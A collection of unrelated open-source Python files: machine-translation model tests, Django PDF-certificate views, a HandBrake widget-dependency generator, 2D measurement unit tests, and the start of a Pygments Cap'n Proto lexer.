self.assertEqual(len(tf.trainable_variables()), len(flatten_vars))
def testFProp(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp))]
print('actual vals = %s' % np.array_repr(np.array(vals)))
self.assertAllClose(vals, [[226.92014, 10.373492], [243.77704, 10.373491],
[260.63403, 10.373494], [200.98639, 10.373491],
[272.30417, 10.373492]])
def testFPropEvalMode(self):
with self.session(), self.SetEval(True):
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp))]
print('actual vals = %s' % np.array_repr(np.array(vals)))
self.assertAllClose(vals, [[226.92014, 10.373492], [243.77704, 10.373491],
[260.63403, 10.373494], [200.98639, 10.373491],
[272.30417, 10.373492]])
def testBProp(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
mdl.BProp()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp, mdl.train_op))[:2]]
print('bprop actual vals = %s' % np.array_repr(np.array(vals)))
expected_vals = [
[226.92014, 10.373492],
[225.25146, 9.585169],
[248.49757, 9.8904505],
[212.02884, 10.943424],
[314.57098, 11.983657],
]
self.assertAllClose(vals, expected_vals, atol=1e-3)
def testDecode(self):
with self.session(use_gpu=False), self.SetEval(True):
tf.random.set_seed(93820985)
p = self._testParams()
mdl = p.Instantiate()
input_batch = mdl.input_generator.GetPreprocessedInputBatch()
dec_out_dict = mdl.Decode(input_batch)
self.evaluate(tf.global_variables_initializer())
dec_out = self.evaluate(dec_out_dict)
metrics_dict = mdl.CreateDecoderMetrics()
key_value_pairs = mdl.PostProcessDecodeOut(dec_out, metrics_dict)
self.assertNear(0.0, metrics_dict['corpus_bleu'].value, 1.0e-5)
self.assertLen(key_value_pairs, 8)
for k, v in key_value_pairs:
self.assertIn(k, v)
def testBatchSplit(self):
def Run(num_splits):
with self.session(use_gpu=False, graph=tf.Graph()):
tf.random.set_seed(93820981)
p = self._testParams()
p.input.bucket_batch_limit = [
b * 2 / num_splits for b in p.input.bucket_batch_limit
]
with cluster_factory.ForTestingWorker(gpus=num_splits):
mdl = p.Instantiate()
metrics = mdl.FPropDefaultTheta()[0]
self.evaluate(tf.global_variables_initializer())
return self.evaluate(metrics['loss'])
res1, res2 = Run(1), Run(2)
self.assertAllClose(res1[0], res2[0])
self.assertAllEqual(res1[1], res2[1])
def testBatchSizeInInputGenerator(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
cluster_params = cluster_factory.Cluster.Params()
cluster_params.mode = 'sync'
cluster_params.job = 'trainer_client'
cluster_params.worker.name = '/job:localhost'
cluster_params.worker.gpus_per_replica = 5
cluster_params.input.name = '/job:localhost'
cluster_params.input.replicas = 1
cluster_params.input.gpus_per_replica = 0
with cluster_params.Instantiate():
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
self.evaluate(tf.global_variables_initializer())
_ = self.evaluate(loss)
self.assertEqual(mdl.input_generator.infeed_bucket_batch_limit, [40])
class HybridModelTest(test_utils.TestCase):
def _InputParams(self):
p = input_generator.NmtInput.Params()
input_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.tfrecord')
vocab_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.vocab')
p.file_pattern = 'tfrecord:' + input_file
p.file_random_seed = 31415
p.file_parallelism = 1
p.bucket_upper_bound = [40]
p.bucket_batch_limit = [8]
p.source_max_length = 200
p.target_max_length = 200
p.tokenizer.token_vocab_filepath = vocab_file
p.tokenizer.vocab_size = 32000
return p
def _EncoderParams(self):
p = encoder.TransformerEncoder.Params()
p.name = 'encoder'
p.random_seed = 1234
p.model_dim = 4
p.token_emb.embedding_dim = 4
p.token_emb.max_num_shards = 1
p.token_emb.params_init = py_utils.WeightInit.GaussianSqrtDim(
seed=p.random_seed)
p.position_emb.embedding_dim = 4
p.transformer_stack.transformer_tpl.tr_atten_tpl.num_attention_heads = 2
p.transformer_stack.transformer_tpl.tr_fflayer_tpl.hidden_dim = 5
return p
def _DecoderParams(self):
p = decoder.MTDecoderV1.Params()
p.name = 'decoder'
p.source_dim = 4
p.emb.vocab_size = 32000
p.emb.embedding_dim = 4
p.emb.max_num_shards = 1
p.rnn_cell_dim = 4
p.rnn_layers = 3
p.attention.hidden_dim = 2
p.softmax.num_classes = 32000
p.softmax.num_shards = 1
return p
def _testParams(self):
p = model.HybridModel.Params()
p.name = 'test_mdl'
p.input = self._InputParams()
p.encoder = self._EncoderParams()
p.decoder = self._DecoderParams()
p.train.learning_rate = 1.0
return p
def testConstruction(self):
with self.session():
p = self._testParams()
mdl = p.Instantiate()
flatten_vars = mdl.vars.Flatten()
print('vars flattened = ', flatten_vars)
# encoder: 91 (1 + 36 + 54)
# encoder/embedding: 1
# encoder/ff_layer: 6 * 6
# encoder/attention: 9 * 6
# decoder: 12 (1 + 3 + 6 + 2)
# decoder/embedding: 1
# decoder/atten: 3
# decoder/lstms: 2 * 3
# decoder/softmax: 2
self.assertEqual(len(flatten_vars), 91 + 12)
# Should match tf.trainable_variables().
self.assertEqual(len(tf.trainable_variables()), len(flatten_vars))
def testFProp(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp))]
print('actual vals = %s' % np.array_repr(np.array(vals)))
self.assertAllClose(vals, [[226.91527, 10.373269], [243.76906, 10.373152],
[260.62787, 10.373248], [200.98814, 10.373582],
[272.297, 10.373219]])
def testFPropEvalMode(self):
with self.session(), self.SetEval(True):
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp))]
print('actual vals = %s' % np.array_repr(np.array(vals)))
self.assertAllClose(vals, [[226.91527, 10.373269], [243.76906, 10.373152],
[260.62787, 10.373248], [200.98814, 10.373582],
[272.297, 10.373219]])
def testBProp(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
mdl.BProp()
loss = mdl.loss
logp = mdl.eval_metrics['log_pplx'][0]
self.evaluate(tf.global_variables_initializer())
vals = []
for _ in range(5):
vals += [self.evaluate((loss, logp, mdl.train_op))[:2]]
print('bprop actual vals = %s' % np.array_repr(np.array(vals)))
expected_vals = [[226.91527, 10.373269], [222.4018, 9.463906],
[248.72293, 9.89942], [181.65323, 9.37565],
[312.97754, 11.922954]]
self.assertAllClose(vals, expected_vals, atol=1e-3)
def testDecode(self):
with self.session(use_gpu=False), self.SetEval(True):
tf.random.set_seed(93820985)
p = self._testParams()
mdl = p.Instantiate()
input_batch = mdl.input_generator.GetPreprocessedInputBatch()
dec_out_dict = mdl.Decode(input_batch)
self.evaluate(tf.global_variables_initializer())
dec_out = self.evaluate(dec_out_dict)
metrics_dict = mdl.CreateDecoderMetrics()
key_value_pairs = mdl.PostProcessDecodeOut(dec_out, metrics_dict)
self.assertNear(0.0, metrics_dict['corpus_bleu'].value, 1.0e-5)
self.assertLen(key_value_pairs, 8)
for k, v in key_value_pairs:
self.assertIn(k, v)
def testBatchSplit(self):
def Run(num_splits):
with self.session(use_gpu=False, graph=tf.Graph()):
tf.random.set_seed(93820981)
p = self._testParams()
p.input.bucket_batch_limit = [
b * 2 / num_splits for b in p.input.bucket_batch_limit
]
with cluster_factory.ForTestingWorker(gpus=num_splits):
mdl = p.Instantiate()
metrics = mdl.FPropDefaultTheta()[0]
self.evaluate(tf.global_variables_initializer())
return self.evaluate(metrics['loss'])
res1, res2 = Run(1), Run(2)
self.assertAllClose(res1[0], res2[0])
self.assertAllEqual(res1[1], res2[1])
def testBatchSizeInInputGenerator(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
cluster_params = cluster_factory.Cluster.Params()
cluster_params.mode = 'sync'
cluster_params.job = 'trainer_client'
cluster_params.worker.name = '/job:localhost'
cluster_params.worker.gpus_per_replica = 5
cluster_params.input.name = '/job:localhost'
cluster_params.input.replicas = 1
cluster_params.input.gpus_per_replica = 0
with cluster_params.Instantiate():
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
loss = mdl.loss
self.evaluate(tf.global_variables_initializer())
_ = self.evaluate(loss)
self.assertEqual(mdl.input_generator.infeed_bucket_batch_limit, [40])
class InsertionModelTest(test_utils.TestCase):
def _InputParams(self):
p = input_generator.NmtInput.Params()
input_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.tfrecord')
vocab_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.vocab')
p.file_pattern = 'tfrecord:' + input_file
p.file_random_seed = 31415
p.file_parallelism = 1
p.bucket_upper_bound = [40]
p.bucket_batch_limit = [8]
p.source_max_length = 200
p.target_max_length = 200
p.tokenizer.token_vocab_filepath = vocab_file
p.tokenizer.vocab_size = 32000
return p
def _DecoderParams(self):
p = decoder.InsertionDecoder.Params()
p.name = 'decoder'
return p
def _testParams(self):
p = model.InsertionModel.Params()
p.name = 'insertion'
p.input = self._InputParams()
p.decoder = self._DecoderParams()
p.random_seed = 12345
return p
def testSampleCanvasAndTargets(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
x = np.asarray([[10, 11, 12, 13, 14, 15, 2], [10, 11, 12, 13, 14, 15, 2],
[2, 0, 0, 0, 0, 0, 0], [10, 11, 12, 13, 14, 2, 0]],
np.int32)
x_paddings = np.asarray([[0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0, 1]],
np.float32)
p = self._testParams()
mdl = p.Instantiate()
descriptor = mdl._SampleCanvasAndTargets(
tf.convert_to_tensor(x), tf.convert_to_tensor(x_paddings))
canvas, canvas_paddings, target_indices, target_weights = self.evaluate([
descriptor.canvas, descriptor.canvas_paddings,
descriptor.target_indices, descriptor.target_weights
])
canvas_gold = np.asarray([[13, 15, 2, 0, 0], [10, 11, 14, 2, 0],
[2, 0, 0, 0, 0], [10, 11, 13, 14, 2]], np.int32)
canvas_paddings_gold = np.asarray(
[[0., 0., 0., 1., 1.], [0., 0., 0., 0., 1.], [0., 1., 1., 1., 1.],
[0., 0., 0., 0., 0.]], np.float32)
target_indices_gold = np.asarray(
[[0, 0, 10], [0, 0, 11], [0, 0, 12], [0, 0, 2], [0, 1, 14], [0, 1, 2],
[0, 2, 2], [1, 0, 2], [1, 1, 2], [1, 2, 12], [1, 2, 13], [1, 2, 2],
[1, 3, 15], [1, 3, 2], [2, 0, 2], [3, 0, 2], [3, 1, 2], [3, 2, 12],
[3, 2, 2], [3, 3, 2], [3, 4, 2]], np.int32)
target_weights_gold = np.asarray([1, 1, 1, 0, 1, 0, 1] +
[1, 1, 1, 1, 0, 1, 0] + [1] +
[1, 1, 1, 0, 1, 1], np.float32)
target_weights_gold = np.reshape(target_weights_gold,
[target_weights_gold.shape[0], 1])
self.assertAllEqual(canvas, canvas_gold)
self.assertAllEqual(canvas_paddings, canvas_paddings_gold)
self.assertAllEqual(target_indices, target_indices_gold)
self.assertAllEqual(target_weights, target_weights_gold)
def testCreateCanvasAndTargets(self):
with self.session():
tf.random.set_seed(_TF_RANDOM_SEED)
batch = py_utils.NestedMap(
src=py_utils.NestedMap(
ids=tf.convert_to_tensor(
np.asarray([
[10, 11, 12, 14, 2, 0],
[20, 21, 22, 24, 25, 2],
], np.int32)),
paddings=tf.convert_to_tensor(
np.asarray([[0, 0, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0]],
np.float32))),
tgt=py_utils.NestedMap(
ids=tf.convert_to_tensor(
np.asarray([[100, 101, 102, 104, 2, 0],
[200, 201, 202, 204, 205, 2]], np.int32)),
paddings=tf.convert_to_tensor(
np.asarray([[0, 0, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0]],
np.float32))))
p = self._testParams()
mdl = p.Instantiate()
descriptor = mdl._CreateCanvasAndTargets(batch)
canvas, canvas_paddings, target_indices, target_weights = self.evaluate([
descriptor.canvas, descriptor.canvas_paddings,
descriptor.target_indices, descriptor.target_weights
])
canvas_gold = np.asarray([
[32014, 32002, 104, 2, 0, 0, 0, 0],
[32020, 32021, 32022, 32002, 200, 201, 202, 2],
], np.int32)
canvas_paddings_gold = np.asarray(
[[0., 0., 0., 0., 1., 1., 1., 1.], [0., 0., 0., 0., 0., 0., 0., 0.]],
np.float32)
target_indices_gold = np.asarray(
[[0, 0, 10], [0, 0, 11], [0, 0, 12], [0, 0, 2], [0, 1, 2], [1, 0, 2],
[1, 1, 2], [1, 2, 2], [1, 3, 24], [1, 3, 25], [1, 3, 2], [0, 2, 100],
[0, 2, 101], [0, 2, 102], [0, 2, 2], [0, 3, 2], [1, 4, 2], [1, 5, 2],
[1, 6, 2], [1, 7, 204], [1, 7, 205], [1, 7, 2]], np.int32)
target_weights_gold = np.asarray([1, 1, 1, 0, 1] + [1, 1, 1, 1, 1, 0] +
[1, 1, 1, 0, 1] + [1, 1, 1, 1, 1, 0],
np.float32)
target_weights_gold = np.reshape(target_weights_gold,
[target_weights_gold.shape[0], 1])
self.assertAllEqual(canvas, canvas_gold)
self.assertAllEqual(canvas_paddings, canvas_paddings_gold)
self.assertAllEqual(target_indices, target_indices_gold)
self.assertAllEqual(target_weights, target_weights_gold)
def testConstruction(self):
with self.session():
p = self._testParams()
mdl = p.Instantiate()
flatten_vars = mdl.vars.Flatten()
self.assertEqual(len(flatten_vars), 122)
self.assertEqual(len(tf.trainable_variables()), len(flatten_vars))
def testFPropGraph(self):
"""Test the construction of the fprop graph, then fprop the graph."""
with self.session():
p = self._testParams()
mdl = p.Instantiate()
mdl.FPropDefaultTheta()
self.evaluate(tf.global_variables_initializer())
self.evaluate(mdl.loss)
class TransformerXEnDecTest(test_utils.TestCase):
def _InputParams(self):
p = input_generator.NmtDoubleInput.Params()
input_file = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_doublebatch_test-000-001')
p.file_pattern = 'tfrecord:' + input_file
p.tokenizer.token_vocab_filepath = test_helper.test_src_dir_path(
'tasks/mt/testdata/wmt14_ende_wpm_32k_test.vocab')
p.file_random_seed = 31415
p.file_parallelism = 1
p.bucket_upper_bound = [10, 20]
p.bucket_batch_limit = [4, 2]
p.source_mask_ratio = -1
p.source_mask_ratio_beta = '2,6'
p.mask_word_id = 31999
p.pad_id = 31998
p.mask_words_ratio = 0.25
p.permutation_distance = 3
p.vocab_file = p.tokenizer.token_vocab_filepath
p.packed_input = False
return p
def _EncoderParams(self):
p = encoder.TransformerXEncoder.Params()
p.name = 'mix_encoder'
p.token_emb.params_init = py_utils.WeightInit.GaussianSqrtDim()
p.token_emb.vocab_size = 32000
p.token_emb.embedding_dim = 4
p.token_emb.max_num_shards = 1
p.token_emb.scale_sqrt_depth = True
p.token_emb.vn = py_utils.VariationalNoiseParams(1.0, False, False)
p.position_emb.embedding_dim = 4
p.position_emb.trainable_scaling = False
p.model_dim = 4
ts = p.transformer_stack
ts.model_dim = 4
ts.num_transformer_layers = 6
ts.transformer_tpl.tr_atten_tpl.num_attention_heads = 2
ts.transformer_tpl.tr_fflayer_tpl.hidden_dim = 4
p.random_seed = 54321
return p
def _DecoderParams(self):
p = decoder.TransformerXDecoder.Params()
p.name = 'mix_decoder'
p.token_emb.params_init = py_utils.WeightInit.GaussianSqrtDim()
p.token_emb.vocab_size = 32000
p.token_emb.embedding_dim = 4
p.token_emb.max_num_shards = 1
p.token_emb.scale_sqrt_depth = True
p.token_emb.vn = py_utils.VariationalNoiseParams(1.0, False, False)
p.position_emb.embedding_dim = 4
p.position_emb.trainable_scaling = False
p.model_dim = 4
p.source_dim = 4
p.num_trans_layers = 6
p.trans_tpl.source_dim = p.model_dim
p.trans_tpl.tr_atten_tpl.source_dim = p.model_dim
p.trans_tpl.tr_atten_tpl.num_attention_heads = 2
p.trans_tpl.tr_atten_tpl.atten_hidden_dim = 4
p.trans_tpl.tr_atten_tpl.atten_tpl.context_dim = p.model_dim
p.trans_tpl.tr_fflayer_tpl.hidden_dim = 4
p.trans_tpl.tr_fflayer_tpl.input_dim = p.model_dim
p.label_smoothing = layers.UniformLabelSmoother.Params()
p.label_smoothing.uncertainty = 0.1
p.per_word_avg_loss = True
p.softmax.num_classes = 32000
p.softmax.num_shards = 1
p.random_seed = 54321
return p
def _testParams(self):
p = model.TransformerXEnDecModel.Params()
p.name = 'xendec'
p.input = self._InputParams()
p.encoder = self._EncoderParams()
p.decoder = self._DecoderParams()
p.random_seed = 12345
return p
def testFProp(self, dtype=tf.float32, fprop_dtype=tf.float32):
with self.session(use_gpu=False):
tf.random.set_seed(_TF_RANDOM_SEED)
p = self._testParams()
p.dtype = dtype
if fprop_dtype:
p.fprop_dtype = fprop_dtype
p.input.dtype = fprop_dtype
mdl = p.Instantiate()
dec_metrics, _ = mdl.FPropDefaultTheta()
self.evaluate(tf.global_variables_initializer())
vals = []
print(mdl)
for _ in range(5):
vals += [
self.evaluate(
(dec_metrics['clean_loss'][0], dec_metrics['other_loss'][0],
dec_metrics['mix_loss'][0], dec_metrics['loss'][0]))
]
print('actual vals = %s' % np.array_repr(np.array(vals)))
self.assertAllClose(
vals, [[10.373864, 10.371083, 10.372491, 31.11744],
[10.36428, 10.379262, 10.366394, 31.109936],
[10.369206, 10.372709, 10.369126, 31.111042],
[10.363656, 10.364362, 10.362683, 31.090702],
[10.371622, 10.374066, 10.371591, 31.11728]],
rtol=1e-02,
atol=1e-02)
if __name__ == '__main__':
tf.test.main()
| tensorflow/lingvo | lingvo/tasks/mt/model_test.py | Python | apache-2.0 | 35,425 | 0.011066 |
# -*- coding: utf-8 -*-
from django.shortcuts import render, redirect
from django.views.generic import View
from django.http import HttpResponse
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import letter
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.units import inch
from reportlab.platypus import (Flowable, Paragraph,
SimpleDocTemplate, Spacer)
from .models import TablaSolicitud
from .models import Bitacora
from .models import TablaAlumno
# Create your views here.
class ConsultarDocumento(View):
template_name = "consultarDocumento.html"
def get(self, request):
return render(
request,
self.template_name,
)
class VerDocumento(View):
template_name = "verDocumento.html"
model = TablaAlumno
model2 = TablaSolicitud
def get(self, request, folio):
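        # Look up the student by code and list their document requests; bounce
        # back to the search page with an error flag if the code is unknown.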
self.request.session['errorConsulta'] = None
print(folio)
context = dict()
try:
alumn=self.model.objects.get(codigo = folio)
except:
self.request.session['errorConsulta'] = "Es incorrecto el código insertado"
return redirect('consultar')
context['solicitudes'] = self.model2.objects.filter(alumno_id=alumn.id)
return render(
request,
self.template_name,
context
)
class VerPdf(View):
template_name = "verPdf.html"
model = TablaSolicitud
model2 = TablaAlumno
def get(self, request, id, solicitudId):
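        # Draw the enrollment certificate with ReportLab and return it as a
        # downloadable PDF attachment.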
response = HttpResponse(content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename="Documento.pdf"'
p = canvas.Canvas(response)
alumno = self.model2.objects.get(codigo=id)
bitacora = self.model.objects.get(id = solicitudId)
# x,y
p.setFont("Helvetica", 16)
p.drawCentredString(260,800,"INSTITUTO POLITECNICO NACIONAL")
p.drawCentredString(260,770,"ESCUELA SUPERIOR DE COMPUTO")
        p.drawCentredString(280,740,"SUBDIRECCION DE SERVICIOS EDUCATIVOS E INTEGRACION SOCIAL")
p.line(120,700,580,700)
p.setFont("Helvetica", 12)
p.drawCentredString(260,715,"DEPARTAMENTO DE GESTION ESCOLAR")
p.drawCentredString(260,700,str(bitacora.documento))
p.drawCentredString(100,695,"A QUIEN CORRESPONDA:")
p.drawCentredString(100,670,"HACE CONSTAR QUE EL ALUMNO")
p.drawCentredString(260,650,str(bitacora.alumno))
p.drawCentredString(100,630,"CON NUMERO DE BOLETA")
p.drawCentredString(230,630,str(bitacora.alumno.boleta))
p.drawCentredString(380,630,"ESTA INSCRITO EN ESTE PLANTEL");
p.drawCentredString(200, 600, str(bitacora.fecha))
p.drawCentredString(200, 610, str(bitacora.estado))
p.drawCentredString(200, 620, str(bitacora.folio))
p.showPage()
p.save()
return response
| CallmeTorre/Idalia | ESCOM/ConsultarDocumento/views.py | Python | apache-2.0 | 2,955 | 0.012864 |
#! /usr/bin/python
import collections
import sys
import json
DepEntry = collections.namedtuple('DepEntry', 'widget dep enable die hide')
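# Field meaning, as inferred from how dep_map is consumed in main() below
# (illustrative reading, not an authoritative spec):
#   widget - name of the controlling widget whose value is watched
#   dep    - name of the dependent widget that reacts to that value
#   enable - value (or '|'-separated set, or '<'-prefixed comparison) that triggers the rule
#   die    - True inverts the rule (dep is disabled when the value matches)
#   hide   - True hides the dep widget instead of merely de-sensitizing it
# Example: DepEntry("title", "queue_add", "none", True, False) would keep
# "queue_add" usable except when "title" is "none".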
dep_map = (
DepEntry("title", "queue_add", "none", True, False),
DepEntry("title", "queue_add_menu", "none", True, False),
DepEntry("title", "queue_add_multiple_menu", "none", True, False),
DepEntry("title", "preview_frame", "none", True, False),
DepEntry("title", "picture_summary", "none", True, False),
DepEntry("title", "picture_summary2", "none", True, False),
DepEntry("title", "chapters_tab", "none", True, False),
DepEntry("title", "start_point", "none", True, False),
DepEntry("title", "end_point", "none", True, False),
DepEntry("title", "angle", "none", True, False),
DepEntry("title", "angle_label", "1", True, False),
DepEntry("use_dvdnav", "angle", "0", True, True),
DepEntry("use_dvdnav", "angle_label", "0", True, True),
DepEntry("angle_count", "angle", "1", True, True),
DepEntry("angle_count", "angle_label", "1", True, True),
DepEntry("vquality_type_bitrate", "VideoAvgBitrate", "1", False, False),
DepEntry("vquality_type_constant", "VideoQualitySlider", "1", False, False),
DepEntry("vquality_type_constant", "VideoTwoPass", "1", True, False),
DepEntry("vquality_type_constant", "VideoTurboTwoPass", "1", True, False),
DepEntry("VideoFramerate", "VideoFrameratePFR", "source", True, True),
DepEntry("VideoFramerate", "VideoFramerateVFR", "source", False, True),
DepEntry("VideoTwoPass", "VideoTurboTwoPass", "1", False, False),
DepEntry("PictureDecombDeinterlace", "PictureDeinterlace", "1", True, True),
DepEntry("PictureDecombDeinterlace", "PictureDeinterlaceCustom", "1", True, True),
DepEntry("PictureDecombDeinterlace", "PictureDeinterlaceLabel", "1", True, True),
DepEntry("PictureDecombDeinterlace", "PictureDecomb", "0", True, True),
DepEntry("PictureDecombDeinterlace", "PictureDecombCustom", "0", True, True),
DepEntry("PictureDecombDeinterlace", "PictureDecombLabel", "0", True, True),
DepEntry("PictureDeinterlace", "PictureDeinterlaceCustom", "custom", False, True),
DepEntry("PictureDenoiseFilter", "PictureDenoisePreset", "off", True, True),
DepEntry("PictureDenoiseFilter", "PictureDenoisePresetLabel", "off", True, True),
DepEntry("PictureDenoiseFilter", "PictureDenoiseTune", "nlmeans", False, True),
DepEntry("PictureDenoiseFilter", "PictureDenoiseTuneLabel", "nlmeans", False, True),
DepEntry("PictureDenoiseFilter", "PictureDenoiseCustom", "off", True, True),
DepEntry("PictureDenoisePreset", "PictureDenoiseCustom", "custom", False, True),
DepEntry("PictureDenoisePreset", "PictureDenoiseTune", "custom", True, True),
DepEntry("PictureDenoisePreset", "PictureDenoiseTuneLabel", "custom", True, True),
DepEntry("PictureDecomb", "PictureDecombCustom", "custom", False, True),
DepEntry("PictureDetelecine", "PictureDetelecineCustom", "custom", False, True),
DepEntry("PictureWidthEnable", "PictureWidth", "1", False, False),
DepEntry("PictureHeightEnable", "PictureHeight", "1", False, False),
DepEntry("PictureAutoCrop", "PictureTopCrop", "0", False, False),
DepEntry("PictureAutoCrop", "PictureBottomCrop", "0", False, False),
DepEntry("PictureAutoCrop", "PictureLeftCrop", "0", False, False),
DepEntry("PictureAutoCrop", "PictureRightCrop", "0", False, False),
DepEntry("x264_bframes", "x264_bpyramid", "<2", True, False),
DepEntry("x264_bframes", "x264_direct", "0", True, False),
DepEntry("x264_bframes", "x264_b_adapt", "0", True, False),
DepEntry("x264_subme", "x264_psy_rd", "<6", True, False),
DepEntry("x264_subme", "x264_psy_trell", "<6", True, False),
DepEntry("x264_trellis", "x264_psy_trell", "0", True, False),
DepEntry("VideoEncoder", "x264FastDecode", "x264", False, True),
DepEntry("VideoEncoder", "x264UseAdvancedOptions", "x264", False, True),
DepEntry("HideAdvancedVideoSettings", "x264UseAdvancedOptions", "1", True, True),
DepEntry("VideoEncoder", "VideoOptionExtraWindow", "x264|x265|mpeg4|mpeg2|VP8", False, True),
DepEntry("VideoEncoder", "VideoOptionExtraLabel", "x264|x265|mpeg4|mpeg2|VP8", False, True),
DepEntry("x264UseAdvancedOptions", "VideoSettingsTable", "1", True, False),
DepEntry("VideoEncoder", "x264_box", "x264", False, True),
DepEntry("x264UseAdvancedOptions", "x264_box", "0", True, False),
DepEntry("auto_name", "autoname_box", "1", False, False),
)
def main():
try:
depsfile = open("widget.deps", "w")
except Exception, err:
print >> sys.stderr, ( "Error: %s" % str(err) )
sys.exit(1)
try:
revfile = open("widget_reverse.deps", "w")
except Exception, err:
print >> sys.stderr, ( "Error: %s" % str(err))
sys.exit(1)
top = dict()
for ii in dep_map:
if ii.widget in top:
continue
deps = list()
for jj in dep_map:
if jj.widget == ii.widget:
deps.append(jj.dep)
top[ii.widget] = deps
json.dump(top, depsfile, indent=4)
top = dict()
for ii in dep_map:
if ii.dep in top:
continue
deps = list()
for jj in dep_map:
if ii.dep == jj.dep:
rec = list()
rec.append(jj.widget)
rec.append(jj.enable)
rec.append(jj.die)
rec.append(jj.hide)
deps.append(rec)
top[ii.dep] = deps
json.dump(top, revfile, indent=4)
main()
| utensil-star/HandBrake | gtk/src/makedeps.py | Python | gpl-2.0 | 5,589 | 0.004831 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import math
import random
import unittest
from measurement_stats import angle
from measurement_stats import value
from measurement_stats import value2D
HALF_SQRT_2 = 0.5 * math.sqrt(2.0)
HALF_SQRT_3 = 0.5 * math.sqrt(3.0)
class TestValue2D(unittest.TestCase):
def test_angleBetween(self):
p1 = value2D.Point2D(
value.ValueUncertainty(2.0, 0.1),
value.ValueUncertainty(0.0, 0.1) )
p2 = value2D.Point2D(
value.ValueUncertainty(0.0, 0.1),
value.ValueUncertainty(2.0, 0.1) )
a = p1.angle_between(p2)
        self.assertAlmostEqual(a.degrees, 90.0, 1)
def test_rotate(self):
tests = [
(90.0, 0.0, 1.0), (-90.0, 0.0, -1.0),
(180.0, -1.0, 0.0), (-180.0, -1.0, 0.0),
(270.0, 0.0, -1.0), (-270.0, 0.0, 1.0),
(360.0, 1.0, 0.0), (-360.0, 1.0, 0.0),
(45.0, HALF_SQRT_2, HALF_SQRT_2),
(-45.0, HALF_SQRT_2, -HALF_SQRT_2),
(315.0, HALF_SQRT_2, -HALF_SQRT_2),
(-315.0, HALF_SQRT_2, HALF_SQRT_2),
(30.0, HALF_SQRT_3, 0.5), (-30.0, HALF_SQRT_3, -0.5),
(330.0, HALF_SQRT_3, -0.5), (-330.0, HALF_SQRT_3, 0.5) ]
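        # Each tuple is (rotation in degrees, expected x/radius, expected
        # y/radius) for a point that starts on the positive x axis.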
for test in tests:
radius = random.uniform(0.001, 1000.0)
p = value2D.Point2D(
value.ValueUncertainty(radius, 0.25),
value.ValueUncertainty(0.0, 0.25) )
p.rotate(angle.Angle(degrees=test[0]))
self.assertAlmostEqual(p.x.raw, radius * test[1], 2)
self.assertAlmostEqual(p.y.raw, radius * test[2], 2)
def test_projection(self):
"""
:return:
"""
line_start = value2D.create_point(0, 0)
line_end = value2D.create_point(1, 1)
point = value2D.create_point(0, 1)
result = value2D.closest_point_on_line(point, line_start, line_end)
self.assertIsNotNone(result)
print('PROJECTION:', result)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestValue2D)
unittest.TextTestRunner(verbosity=2).run(suite)
| sernst/RefinedStatistics | measurement_stats/test/test_value2D.py | Python | mit | 2,275 | 0.002198 |
# -*- coding: utf-8 -*-
"""
pygments.lexers.capnproto
~~~~~~~~~~~~~~~~~~~~~~~~~
Lexers for the Cap'n Proto schema language.
:copyright: Copyright 2006-2019 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, default
from pygments.token import Text, Comment, Keyword, Name, Literal
__all__ = ['CapnProtoLexer']
class CapnProtoLexer(RegexLexer):
"""
For `Cap'n Proto <https://capnproto.org>`_ source.
.. versionadded:: 2.2
"""
name = 'Cap\'n Proto'
filenames = ['*.capnp']
aliases = ['capnp']
flags = re.MULTILINE | re.UNICODE
tokens = {
'root': [
(r'#.*?$', Comment.Single),
(r'@[0-9a-zA-Z]*', Name.Decorator),
(r'=', Literal, 'expression'),
